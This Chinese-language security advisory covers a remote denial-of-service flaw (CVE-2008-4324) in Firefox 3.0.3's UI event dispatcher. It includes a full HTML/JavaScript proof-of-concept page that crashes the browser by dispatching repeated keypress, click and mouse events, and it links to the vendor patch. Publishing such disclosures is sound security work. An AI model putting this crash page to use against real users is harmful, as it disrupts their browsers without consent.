发布日期：2008-09-29
更新日期：2008-11-27

受影响系统：

Mozilla Firefox 3.0.3

描述：

---

BUGTRAQ  ID: 31476
CVE(CAN) ID: CVE-2008-4324

Firefox是一款非常流行的开源WEB浏览器。

Firefox 3.0.3的用户界面事件分配器存在远程拒绝服务漏洞，远程攻击者通过一系列按键、单击、按下鼠标等事件，利用此漏洞可造成拒绝服务。

<*来源：Aditya K Sood （0kn0ck@secniche.org）
  
  链接：http://secunia.com/advisories/32040
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

<html> <title>Mozilla Firefox User Interface Dispatcher Crash and Remote Denial of Service</title> <head> <script language = "JavaScript"> var moz303 = document.createEvent("UIEvents"); moz303.initUIEvent("keypress", true, true, this, 1); for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++) { document.documentElement.dispatchEvent(moz303); } moz303.initUIEvent("click", true, true, this, 1); for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++) { document.documentElement.dispatchEvent(moz303); } moz303.initUIEvent("onkeydown", true, true, this, 1); for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++) { document.documentElement.dispatchEvent(moz303); } moz303.initUIEvent("onkeyup", true, true, this, 1); for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++) { document.documentElement.dispatchEvent(moz303); } moz303.initUIEvent("onmousedown", true, true, this, 1); for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++) { document.documentElement.dispatchEvent(moz303); } moz303.initUIEvent("onmouseup", true, true, this, 1); for (var moz303_loop = 1 ; moz303_loop < 10 ; moz303_loop++) { document.documentElement.dispatchEvent(moz303); } </script> </head>

建议：

---

厂商补丁：

Mozilla
-------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.mozilla.org/security/

浏览次数：1651
严重程度：0（网友投票）